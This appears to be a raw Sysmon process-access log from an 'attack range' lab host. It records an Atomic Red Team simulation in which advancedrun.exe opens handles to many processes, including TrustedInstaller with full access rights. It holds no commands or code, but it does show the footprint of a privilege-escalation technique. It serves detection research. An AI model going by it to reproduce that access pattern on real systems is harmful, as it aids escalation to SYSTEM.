17:59:08.366{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-F419-61EA-6A04-000000002702}4528C:\Windows\servicing\TrustedInstaller.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21f3|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21bd|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003984005Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.366{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-F46C-61EA-8104-000000002702}2464C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003984003Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.366{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-F419-61EA-6A04-000000002702}4528C:\Windows\servicing\TrustedInstaller.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003984002Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.366{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-F392-61EA-4B04-000000002702}948C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003984001Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.366{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-F392-61EA-4A04-000000002702}5408C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003984000Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.366{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983999Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.366{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983998Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.366{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-E491-61EA-F201-000000002702}3896C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983997Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.366{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003983996Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.366{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983995Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.366{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983994Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.366{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9700-000000002702}5364C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983993Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.366{834264DD-DAE7-61EA-1700-000000002702}13002268C:\Windows\System32\svchost.exe{834264DD-F46C-61EA-8104-000000002702}2464C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\seclogon.dll+1404|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003983992Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.366{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB11-61EA-9500-000000002702}428C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983991Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.366{834264DD-DAE7-61EA-1700-000000002702}13002268C:\Windows\System32\svchost.exe{834264DD-F46C-61EA-8104-000000002702}2464C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe0x14c0C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\seclogon.dll+128d|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003983990Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.366{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-9000-000000002702}3336C:\Windows\System32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983989Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.366{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8F00-000000002702}4948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983988Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 